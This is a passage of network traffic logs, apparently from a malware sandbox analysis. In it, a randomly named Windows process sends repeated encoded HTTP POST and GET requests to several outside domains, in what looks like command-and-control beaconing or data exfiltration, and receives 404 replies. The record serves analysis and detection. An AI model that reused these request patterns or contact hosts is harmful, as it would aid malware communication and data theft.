                                                                                                                                                  Data Ascii: W638b4U=8vbH32UxUjL6oP5tCH/10iCLlWNRf3iXymS4z5I7WqnxlHtZ3vs6i0CZInR+gJhVq9cSvQJwFnGnjixq3u1yNpk0wgnqyasIcqhq1JI7NJg73hauRWfmCSWwtHALJhFJmHQ9afdOPbGb7l+Ccm8LNKWmHnqaqInoVQpi+oyikKqMYfbdfzSNyCgtVC/PpUkm6UGCd9cwmfvX3/sAgLiDiXtiX243/mle+Y5g5iMcp47HR2iZcBL+7+Zs/KMLvhx6FpNEj9mPpJCotZDPof7gwQbW5piBMVvl34j0sLLOsUacv6P6FkEFgMXfMIMlsYBTmoxzzOeuGHXe/+BWAEUekv8fQTwzAlTnp34Zo65XPqONA0KOmWXVn7re8fVhS2k2qOeDw8SU5Kw3E6rmMoDXBsAm1UK3pLXPQuz80GTSaw8CC61+T6jkM1ttyImrw2SrmfI/UZj8iVX9ErkX2O/c1P1Ik2oC1YafPK4OAFoxLgwNZEnBIiYrgzU0p0sVKUqzxvCu4S7k7brWOx/eixARI2vTT5WAG5YtBAfBuFF/Ll7qGUyAdRsgnTl4tgGN+gt403SnBVBW72ihOeH1rD1WNzqSGbU4pyzWg6SGA3ruDLhlZkFE6KDp4Eip3AyTUv3w/kAo09l/Za5WNYKi1CjFxYZK8UwI40hqmlrYkvGXRhdm5EU+QnbzPNT+RGpqHm1gZAq5bMQq7iBPPy4IctrRBZKayvU+jyLbasNvbTTEiXH8qcqw8bwuXnx/6RNFY67/mUK4l2ZHFo9qqIkB1MSe7ba5NKKrCrch/1t06wcVFgKnBghwW2PL0tJIqfusWKxeZ1zAi8kQB1lBLxPdgomkFDnTM3vLf0AwfzZm+JAabsmY9xuF19yRouCA+sRN4pQYpUITVKFYzQBQ7bn90HJg+opVwUOfvldrJU1vrUmUbR8nO5o2NhP66HZH3jTt1ca06nbStFEsNB1dXBxYh+CQCBfsH5AkjXCD4L/9pGZuI072 [TRUNCATED]
                                                                                                                                                  Nov 14, 2024 15:42:10.511049986 CET390INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:42:10 GMT
                                                                                                                                                  Server: Apache
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                  Content-Length: 179
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                                                                                                  Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  40192.168.2.55001947.52.221.8804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:12.066786051 CET383OUTGET /9ezc/?Xll=50hLc0Hhy&W638b4U=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+NZNi8BTPy99Tau97oJsSOpJizwynXn/5fxfwmQ1lNSou+g== HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.wukong.college
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:42:13.143342972 CET390INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:42:12 GMT
                                                                                                                                                  Server: Apache
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Content-Length: 203
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 65 7a 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9ezc/ was not found on this server.</p></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  41192.168.2.55002023.106.59.18804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:18.379656076 CET663OUTPOST /95c0/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.vehiculargustav.click
                                                                                                                                                  Origin: http://www.vehiculargustav.click
                                                                                                                                                  Referer: http://www.vehiculargustav.click/95c0/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 35 6f 5a 52 5a 4a 74 52 67 62 58 4d 4f 76 55 72 47 31 59 43 64 37 6a 38 53 50 2b 61 51 73 71 4b 54 6a 4d 4e 70 43 32 50 48 48 6e 6a 34 4a 55 45 68 7a 41 70 78 7a 52 4e 6e 38 30 76 59 79 31 34 4b 59 35 45 2f 64 6c 48 39 64 6c 72 35 55 62 42 41 46 33 34 59 66 64 2f 6d 57 34 45 30 59 61 50 65 61 67 33 30 4d 50 78 71 49 74 56 47 34 37 5a 4e 62 45 63 68 71 54 62 47 46 69 67 68 67 6c 6d 66 6f 6c 36 2f 4c 4f 44 6f 70 32 68 32 43 2b 6f 62 41 75 37 68 45 2b 66 45 78 4f 47 67 42 35 4c 6c 63 69 51 4c 76 6a 64 66 6d 39 63 30 66 30 7a 74 6e 2b 71 55 42 41 52 72 43 55 4d 70 64 71 45 46 4a 34 77 32 61 77 3d
                                                                                                                                                  Data Ascii: W638b4U=5oZRZJtRgbXMOvUrG1YCd7j8SP+aQsqKTjMNpC2PHHnj4JUEhzApxzRNn80vYy14KY5E/dlH9dlr5UbBAF34Yfd/mW4E0YaPeag30MPxqItVG47ZNbEchqTbGFighglmfol6/LODop2h2C+obAu7hE+fExOGgB5LlciQLvjdfm9c0f0ztn+qUBARrCUMpdqEFJ4w2aw=
                                                                                                                                                  Nov 14, 2024 15:42:19.205506086 CET423INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:42:14 GMT
                                                                                                                                                  Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                                                                                  Content-Length: 203
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  42192.168.2.55002123.106.59.18804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:20.927007914 CET683OUTPOST /95c0/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.vehiculargustav.click
                                                                                                                                                  Origin: http://www.vehiculargustav.click
                                                                                                                                                  Referer: http://www.vehiculargustav.click/95c0/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 35 6f 5a 52 5a 4a 74 52 67 62 58 4d 50 50 6b 72 48 55 59 43 66 62 6a 2f 4f 66 2b 61 61 4d 72 69 54 6a 49 4e 70 44 79 6c 48 31 54 6a 39 64 59 45 67 79 41 70 39 54 52 4e 76 63 30 6d 56 53 31 7a 4b 59 31 69 2f 59 46 48 39 64 5a 72 35 52 6e 42 63 69 44 33 5a 50 64 78 74 32 34 43 70 49 61 50 65 61 67 33 30 49 66 4c 71 49 31 56 47 49 4c 5a 4d 36 45 62 76 4b 54 59 48 46 69 67 6c 67 6c 69 66 6f 6c 45 2f 4a 37 4c 6f 73 36 68 32 44 4f 6f 61 53 4b 36 75 45 2b 64 41 78 50 6b 6b 7a 30 63 2f 4d 54 65 52 50 57 4b 46 48 6c 50 34 4a 46 5a 33 46 32 43 48 68 73 70 37 52 63 37 34 74 4c 74 66 71 6f 41 6f 4e 6e 35 6c 62 42 77 47 30 74 68 7a 66 4e 44 73 63 58 72 54 45 66 33
                                                                                                                                                  Data Ascii: W638b4U=5oZRZJtRgbXMPPkrHUYCfbj/Of+aaMriTjINpDylH1Tj9dYEgyAp9TRNvc0mVS1zKY1i/YFH9dZr5RnBciD3ZPdxt24CpIaPeag30IfLqI1VGILZM6EbvKTYHFiglglifolE/J7Los6h2DOoaSK6uE+dAxPkkz0c/MTeRPWKFHlP4JFZ3F2CHhsp7Rc74tLtfqoAoNn5lbBwG0thzfNDscXrTEf3
                                                                                                                                                  Nov 14, 2024 15:42:21.730305910 CET423INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:42:17 GMT
                                                                                                                                                  Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                                                                                  Content-Length: 203
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  43192.168.2.55002223.106.59.18804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:23.472651958 CET1700OUTPOST /95c0/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.vehiculargustav.click
                                                                                                                                                  Origin: http://www.vehiculargustav.click
                                                                                                                                                  Referer: http://www.vehiculargustav.click/95c0/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 35 6f 5a 52 5a 4a 74 52 67 62 58 4d 50 50 6b 72 48 55 59 43 66 62 6a 2f 4f 66 2b 61 61 4d 72 69 54 6a 49 4e 70 44 79 6c 48 31 4c 6a 68 2b 51 45 76 78 59 70 2b 54 52 4e 77 73 30 6a 56 53 31 55 4b 59 74 2b 2f 59 41 79 39 59 56 72 34 7a 66 42 51 48 76 33 58 50 64 78 77 6d 34 44 30 59 62 56 65 61 77 7a 30 4d 44 4c 71 49 31 56 47 4c 54 5a 4c 72 45 62 74 4b 54 62 47 46 69 6b 68 67 6c 4b 66 6f 73 2f 2f 4a 76 62 6f 66 79 68 34 44 65 6f 63 67 53 36 78 30 2b 44 4e 52 50 43 6b 7a 35 62 2f 50 6d 76 52 50 53 73 46 47 52 50 36 39 51 64 6e 47 65 4c 45 69 45 7a 77 69 55 56 35 4a 4c 53 56 61 6f 4b 6b 4e 6a 6f 67 50 49 54 44 78 68 6e 2b 38 63 39 32 39 72 63 63 45 69 30 44 36 35 39 50 44 69 38 6b 42 4e 75 70 55 39 65 66 6a 4d 51 63 35 75 36 6a 6d 45 52 6e 6f 55 69 42 70 5a 4b 63 4f 6d 38 64 61 6e 37 32 38 69 56 74 5a 6e 4f 63 71 70 32 74 7a 47 62 2b 58 53 4e 53 76 30 38 42 54 36 4b 66 7a 39 4c 44 64 4c 70 2f 58 51 52 42 62 2b 44 32 65 56 62 7a 59 2b 6c 36 36 74 65 6b 77 6b 77 67 32 51 42 2f 6b [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=5oZRZJtRgbXMPPkrHUYCfbj/Of+aaMriTjINpDylH1Ljh+QEvxYp+TRNws0jVS1UKYt+/YAy9YVr4zfBQHv3XPdxwm4D0YbVeawz0MDLqI1VGLTZLrEbtKTbGFikhglKfos//Jvbofyh4DeocgS6x0+DNRPCkz5b/PmvRPSsFGRP69QdnGeLEiEzwiUV5JLSVaoKkNjogPITDxhn+8c929rccEi0D659PDi8kBNupU9efjMQc5u6jmERnoUiBpZKcOm8dan728iVtZnOcqp2tzGb+XSNSv08BT6Kfz9LDdLp/XQRBb+D2eVbzY+l66tekwkwg2QB/kn9DDaZmlZf5RAwaKsQNudRV+581HMJzp6U1coTJgSa4HEjNimGmxkXXcCIOfHqdJ3ObWOZY7xXEvlJHt1b/dFPgxOndCa6CoIYDu9O0tpFMc0qRy7ecKXD+mW30Ae6mQZDd4dEciPpC0iX8f+F3rqh/IQcP7eIlROiFXQoww+zOR8UfbyxfaiIAnGu99m3RtRnMCeYZVRPeljdKvV3iWAXElz+y7VJt98JZiMgkhJiBUsS2zkcYGnwPlITXpajY5GVkRs3DiFbpxgYYZPhCuscAAAerHYg5OAulpjmjqVQdSbsdQjQO6Y5DPfVh5/Bhe1lSCRheQZPGufZRH/GhLyiVR/mMdkLFOaEr56ZjgBFB0cLoi/GXne5UjGs9G4Qae415/5Z3WxU7SPN5Zhh9htLJUaTvr+VPrcgPYoEEGz1G8tnxwV+8mrYisKuYREsKJKuL/5WuNbowJXmgNOVlkGulEcQT58pIEeeCHoYg0+UNyKb8gqccdbeQDNqXz/nRTQn0HOQzM/+YbWjEsMyHP2FJa0wRq98KD7aWalZbVk/+4YEz+J/6P6ObpNfM5qMqaFwOcR6Usj6G+ySJvQylW0qoJzXybctc6/1IerTS+EvSc9tAujHCSmG8GRwN/awCbHr3Ho5Qw2lTKzM11cEH52CbbMkPOdknZn6 [TRUNCATED]
                                                                                                                                                  Nov 14, 2024 15:42:24.278050900 CET423INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:42:19 GMT
                                                                                                                                                  Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                                                                                  Content-Length: 203
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  44192.168.2.55002323.106.59.18804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:26.017354012 CET390OUTGET /95c0/?W638b4U=0qxxa8sZzaTQGsV+IlYRUJribMqFDMjNP0hPtjDvBTL1oNFysxcHk25mntsLFh1aL6dJocQb44ZX+yLzRXP4Uod4s1803YDXY8kloLbvjpkOPOrnE5sGxLOIJT+RqysedQ==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.vehiculargustav.click
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:42:26.817015886 CET423INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:42:22 GMT
                                                                                                                                                  Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                                                                                  Content-Length: 203
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  45192.168.2.550024208.91.197.27804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:40.278240919 CET645OUTPOST /fjsq/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.yushaliu.online
                                                                                                                                                  Origin: http://www.yushaliu.online
                                                                                                                                                  Referer: http://www.yushaliu.online/fjsq/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 4c 72 78 4c 62 6d 32 50 64 4b 4c 69 77 46 2b 79 72 50 58 49 58 2b 77 63 6e 7a 78 31 58 6b 62 41 35 4b 54 76 68 4a 46 58 39 44 49 66 36 41 56 4a 36 72 73 6e 48 58 39 44 6e 4a 78 6c 55 67 51 46 55 4b 71 41 72 70 66 4e 6c 4e 74 6e 7a 45 63 6d 72 43 2b 5a 53 47 61 49 55 71 66 61 43 44 63 34 4c 4c 63 58 76 55 79 39 4f 42 30 30 42 4e 75 35 6d 34 67 78 41 7a 55 43 61 58 45 69 2f 4a 46 74 79 48 49 50 6a 41 4c 45 7a 45 47 71 63 51 79 42 6b 34 33 54 6b 53 39 49 48 2b 69 30 6c 4c 66 6e 6e 63 36 67 68 6e 64 52 39 7a 4c 30 72 42 4b 7a 33 73 6d 51 6a 52 4f 61 58 34 2b 4d 45 6e 46 66 52 4d 39 50 41 63 59 3d
                                                                                                                                                  Data Ascii: W638b4U=LrxLbm2PdKLiwF+yrPXIX+wcnzx1XkbA5KTvhJFX9DIf6AVJ6rsnHX9DnJxlUgQFUKqArpfNlNtnzEcmrC+ZSGaIUqfaCDc4LLcXvUy9OB00BNu5m4gxAzUCaXEi/JFtyHIPjALEzEGqcQyBk43TkS9IH+i0lLfnnc6ghndR9zL0rBKz3smQjROaX4+MEnFfRM9PAcY=


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  46192.168.2.550025208.91.197.27804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:42.821852922 CET665OUTPOST /fjsq/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.yushaliu.online
                                                                                                                                                  Origin: http://www.yushaliu.online
                                                                                                                                                  Referer: http://www.yushaliu.online/fjsq/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 4c 72 78 4c 62 6d 32 50 64 4b 4c 69 69 77 75 79 6f 6f 72 49 66 2b 77 64 6f 54 78 31 43 30 61 4a 35 4b 66 76 68 4d 38 4b 39 51 67 66 36 67 6c 4a 6f 2f 41 6e 45 58 39 44 73 70 78 6b 61 41 51 65 55 4b 6d 79 72 73 2f 4e 6c 4a 4e 6e 7a 45 73 6d 72 53 43 65 53 57 61 4b 42 36 66 59 47 44 63 34 4c 4c 63 58 76 55 33 71 4f 43 45 30 42 39 2b 35 6c 5a 67 32 44 7a 55 44 64 58 45 69 75 5a 46 70 79 48 4a 63 6a 42 58 69 7a 47 2b 71 63 52 69 42 6b 74 62 51 75 53 39 4f 5a 4f 6a 72 6c 5a 69 41 6c 66 4f 52 74 6d 31 52 6d 46 2f 42 71 33 37 5a 74 4f 75 34 77 78 69 69 48 72 32 37 56 58 6b 32 4c 76 74 2f 65 4c 50 61 42 69 65 59 4a 45 4e 6c 34 34 35 4d 38 51 6b 38 38 31 76 72
                                                                                                                                                  Data Ascii: W638b4U=LrxLbm2PdKLiiwuyoorIf+wdoTx1C0aJ5KfvhM8K9Qgf6glJo/AnEX9DspxkaAQeUKmyrs/NlJNnzEsmrSCeSWaKB6fYGDc4LLcXvU3qOCE0B9+5lZg2DzUDdXEiuZFpyHJcjBXizG+qcRiBktbQuS9OZOjrlZiAlfORtm1RmF/Bq37ZtOu4wxiiHr27VXk2Lvt/eLPaBieYJENl445M8Qk881vr


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  47192.168.2.550026208.91.197.27804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:45.360934019 CET1682OUTPOST /fjsq/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.yushaliu.online
                                                                                                                                                  Origin: http://www.yushaliu.online
                                                                                                                                                  Referer: http://www.yushaliu.online/fjsq/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
